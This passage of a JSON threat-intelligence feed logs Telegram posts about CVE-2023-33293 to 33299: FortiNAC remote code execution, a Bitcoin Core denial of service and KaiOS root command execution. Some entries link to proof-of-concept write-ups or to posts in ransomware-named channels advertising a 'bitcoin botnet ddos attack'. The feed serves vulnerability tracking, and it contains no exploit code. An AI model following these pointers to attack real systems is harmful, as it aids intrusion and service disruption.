"seen", "source": "Telegram/sKqndYd6CqOPhKzZdSpoUa_Zk_pM-4uUsEvc4a0ClWK0XRo", "content": "", "creation_timestamp": "2024-09-11T13:42:39.000000Z"}, {"uuid": "860047ed-6c08-4772-89e4-777d036e8b2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "https://t.me/LockBitRaasRansomware/44396", "content": "cve-2023-33297\nbitcoin botnet ddos attack\n\n\u0412\u0438\u0434\u0435\u043e + \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435", "creation_timestamp": "2024-07-13T17:07:20.000000Z"}, {"uuid": "9f140d36-000c-47d4-8901-f508f0290a9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "https://t.me/LockBitRaasRansomware/44357", "content": "cve-2023-33297\nbitcoin botnet ddos attack\n\n\u0412\u0438\u0434\u0435\u043e + \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435", "creation_timestamp": "2024-07-13T01:34:04.000000Z"}, {"uuid": "8bb9385b-edd6-4df2-887f-9792aaef14ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "https://t.me/KomunitiSiber/410", "content": "New Fortinet's FortiNAC Vulnerability Exposes Networks to Code Execution Attacks\nhttps://thehackernews.com/2023/06/new-fortinets-fortinac-vulnerability.html\n\nFortinet has rolled out updates to address a critical security vulnerability impacting its FortiNAC network access control solution that could lead to the execution of arbitrary code.\nTracked as\u00a0CVE-2023-33299, the flaw is rated 9.6 out of 10 for severity on the CVSS scoring system. It has been described as a case of Java untrusted object deserialization.\n\"A\u00a0deserialization\u00a0of untrusted data", "creation_timestamp": "2023-06-27T08:13:37.000000Z"}, {"uuid": "64cd5c47-f589-4289-8b81-ee18e55ea07e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "https://t.me/CyberSecurityIL/24468", "content": "\u05d0\u05ea\u05dd \u05de\u05e6\u05dc\u05d9\u05d7\u05d9\u05dd \u05dc\u05e2\u05e7\u05d5\u05d1? \u05d7\u05d5\u05dc\u05e9\u05d4 \u05e0\u05d5\u05e1\u05e4\u05ea \u05de\u05d1\u05d9\u05ea Fortinet \u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05ea\u05d5\u05e7\u05e3 \u05dc\u05d4\u05e8\u05d9\u05e5 \u05e7\u05d5\u05d3 \u05de\u05e8\u05d7\u05d5\u05e7 \u05d1\u05de\u05e2\u05e8\u05db\u05ea FortiNAC.\n\n\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 CVE-2023-33299 \u05de\u05e7\u05d1\u05dc\u05ea \u05d3\u05e8\u05d2\u05ea \u05e1\u05d9\u05db\u05d5\u05df 9.6 \u05de\u05ea\u05d5\u05da 10.\n\u05d7\u05d1\u05e8\u05ea Fortinet \u05e4\u05d9\u05e8\u05e1\u05de\u05d4 \u05ea\u05d9\u05e7\u05d5\u05df \u05dc\u05d7\u05d5\u05dc\u05e9\u05d4.\n\n\u05dc\u05de\u05d9 \u05e9\u05dc\u05d0 \u05de\u05e6\u05dc\u05d9\u05d7 \u05dc\u05e2\u05e7\u05d5\u05d1, \u05d7\u05d1\u05e8\u05ea Fortinet \u05e4\u05d9\u05e8\u05e1\u05de\u05d4 \u05e9\u05de\u05d5\u05e0\u05d4 \u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05d7\u05d3\u05e9\u05d5\u05ea \u05d1\u05e9\u05d1\u05d5\u05e2\u05d9\u05d9\u05dd \u05d4\u05d0\u05d7\u05e8\u05d5\u05e0\u05d9\u05dd.\n\n\u05db\u05dc \u05d4\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05e4\u05d5\u05e8\u05e1\u05de\u05d5 \u05d1\u05e4\u05d9\u05d3 \u05d4\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05d4\u05d6\u05de\u05d9\u05df \u05dc\u05d0\u05dc\u05d5 \u05d4\u05ea\u05d5\u05de\u05db\u05d9\u05dd \u05d1\u05e2\u05e8\u05d5\u05e5.\n\nhttps://t.me/CyberSecurityIL/3308\n\n#\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea", "creation_timestamp": "2023-06-27T10:35:23.000000Z"}, {"uuid": "e74a763d-a37d-4bb6-9b32-b34f32edfe72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "seen", "source": "https://t.me/killmilk_rus/1809", "content": "cve-2023-33297\nbitcoin botnet ddos attack\n\n\u0412\u0438\u0434\u0435\u043e + \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435\n\n#bonus", "creation_timestamp": "2024-06-12T14:10:33.000000Z"}, {"uuid": "bef6ac7b-bf57-477e-82ac-60a248d72a59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1775", "content": "\u041a\u0440\u0438\u0432\u043e \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u043b\u0438 cve-2023-33297\n\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0441\u044f bitcoin botnet ddos attack\n\u0412\u0438\u0434\u0435\u043e + \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435\n\n#btc", "creation_timestamp": "2023-10-15T14:09:49.000000Z"}, {"uuid": "c90d17fc-f2bc-4ebb-8ff6-3ef6e78f56a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "https://t.me/true_secator/4536", "content": "Fortinet \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 FortiNAC, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0438 \u043a\u043e\u043c\u0430\u043d\u0434.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2023-33299 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0424\u043b\u043e\u0440\u0438\u0430\u043d\u043e\u043c \u0425\u0430\u0443\u0437\u0435\u0440\u043e\u043c \u0438\u0437 Code White \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u043e\u0446\u0435\u043d\u043a\u0443 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 9,6 \u0438\u0437 10.\n\n\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u043d\u0435\u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a RCE \u0431\u0435\u0437 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u043a \u0441\u043b\u0443\u0436\u0431\u0435 TCP/1050.\n\n\u041f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 FortiNAC \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 9.4.0-9.4.2, 9.2.0-9.2.7, 9.1.0-9.1.9, 7.2.0-7.2.1, \u0430 \u0442\u0430\u043a\u0436\u0435 8.3, 8.5-8.8 (\u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438).\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u044b \u0432 9.4.3, 9.2.8, 9.1.10 \u0438 7.2.2 (\u0438\u043b\u0438 \u0432\u044b\u0448\u0435).\n\n\u041f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043d\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u043e \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u043a\u0440\u043e\u043c\u0435, \u043a\u0430\u043a \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f.\n\n\u041d\u0430\u0440\u044f\u0434\u0443 \u0441 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 RCE, Fortinet \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430 \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u0440\u0435\u0434\u043d\u0435\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 CVE-2023-33300, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0443\u044e \u0441 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 \u043d\u0435\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0435\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0443\u044e FortiNAC 9.4.0-9.4.3 \u0438 7.2.0-7.2.1.\n\n\u041e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443, \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u043c\u0443 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438, \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0432 \u0434\u0440\u0443\u0433\u0438\u0435 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0447\u0435\u0440\u0435\u0437 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044f \u0432\u0432\u043e\u0434\u0430.\n\n\u041f\u0440\u0430\u0432\u0434\u0430, \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043b\u0438\u0448\u044c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c \u0441 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043e\u0441\u043e\u0431\u044b\u0439 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u0441\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f \u043a \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u043c Fortinet, \u0430\u0434\u043c\u0438\u043d\u043e\u0432 \u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u043e\u0432 \u0418\u0411 \u0432\u043f\u0435\u0440\u0435\u0434\u0438 \u043e\u0436\u0438\u0434\u0430\u044e\u0442 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u0432\u044b\u0445\u043e\u0434\u043d\u044b\u0435.\n\n\u0412\u0435\u0434\u044c \u043a\u0430\u043a \u043c\u044b \u043f\u043e\u043c\u043d\u0438\u043c \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f RCE (CVE-2022-39952) \u0432 FortiNAC \u043f\u043e\u0441\u043b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0431\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0447\u0435\u0440\u0435\u0437 \u043f\u0430\u0440\u0443 \u0434\u043d\u0435\u0439.\n\n\u041d\u043e, \u043f\u0440\u043e \u0432\u044b\u0445\u043e\u0434\u043d\u044b\u0435 - \u043f\u043e\u043f\u043e\u0437\u0436\u0435.", "creation_timestamp": "2023-06-23T17:20:05.000000Z"}, {"uuid": "71cf26a0-5bd5-4608-bec0-4ec60c0f855b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/811", "content": "CVE-2023-33299 &amp; CVE-2023-33300 : FortiNAC - Just a few more RCEs\nLink : https://frycos.github.io/vulns4free/2023/06/18/fortinac.html", "creation_timestamp": "2023-08-11T14:30:31.000000Z"}, {"uuid": "56b2ce88-8a08-46d3-99e9-bbb86a657bc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "exploited", "source": "Telegram/OwlTyI4VWu1QpbV6ovWiDhy9631hYwoSTz62vFbNVohWGQ", "content": "", "creation_timestamp": "2024-10-29T10:20:16.000000Z"}, {"uuid": "1f0c7f04-b65a-4041-a01c-8a073fcba431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33295", "type": "seen", "source": "https://t.me/ctinow/170411", "content": "https://ift.tt/eQFdEwN\nCVE-2023-33295", "creation_timestamp": "2024-01-19T21:27:20.000000Z"}, {"uuid": "0393bb59-4319-47db-8c0c-4481045e9faa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33293", "type": "seen", "source": "https://t.me/cibsecurity/64544", "content": "\u203c CVE-2023-33293 \u203c\n\nAn issue was discovered in KaiOS 3.0 and 3.1. The binary /system/kaios/api-daemon exposes a local web server on *.localhost with subdomains for each installed applications, e.g., myapp.localhost. An attacker can make fetch requests to api-deamon to determine if a given app is installed and read the manifest.webmanifest contents, including the app version.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-05-22T20:25:26.000000Z"}, {"uuid": "0fd2e16b-3ce7-4eb2-9daa-004642d0bb3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33299", "type": "seen", "source": "https://t.me/thehackernews/3529", "content": "\u26a1\ufe0f Urgent security alert! Fortinet has released urgent updates to fix a critical vulnerability (CVE-2023-33299) in FortiNAC, exposing networks to arbitrary code execution.  \n \nLearn more: https://thehackernews.com/2023/06/new-fortinets-fortinac-vulnerability.html", "creation_timestamp": "2023-06-27T07:42:52.000000Z"}, {"uuid": "2316f855-dd93-4bff-b51b-17fc36dcf9f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33295", "type": "seen", "source": "https://t.me/ctinow/185748", "content": "https://ift.tt/Jk6MHLI\nCVE-2023-33295 | Cohesity DataProtect 6.6.0d/6.8.1 TLS Certificate Validation access control", "creation_timestamp": "2024-02-15T18:23:11.000000Z"}, {"uuid": "826dbe95-94ef-40d7-95a6-805b6eec8152", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33294", "type": "seen", "source": "https://t.me/cibsecurity/64546", "content": "\u203c CVE-2023-33294 \u203c\n\nAn issue was discovered in KaiOS 3.0 before 3.1. The /system/bin/tctweb_server binary exposes a local web server that responds to GET and POST requests on port 2929. The server accepts arbitrary Bash commands and executes them as root. Because it is not permission or context restricted and returns proper CORS headers, it's accessible to all websites via the browser. At a bare minimum, this allows an attacker to retrieve a list of the user's installed apps, notifications, and downloads. It also allows an attacker to delete local files and modify system properties including the boolean persist.moz.killswitch property (which would render the device inoperable). This vulnerability is partially mitigated by SELinux which prevents reads, writes, or modifications to files or permissions within protected partitions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-05-22T20:25:32.000000Z"}, {"uuid": "ca05a8cb-7a63-42ee-b672-68c5a54ee85e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-33297", "type": "exploited", "source": "https://t.me/cibsecurity/64502", "content": "\u203c CVE-2023-33297 \u203c\n\nBitcoin Core before 24.1, when debug mode is not used, allows attackers to cause a denial of service (CPU consumption) because draining the inventory-to-send queue is inefficient, as exploited in the wild in May 2023.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-05-22T12:25:22.000000Z"}]}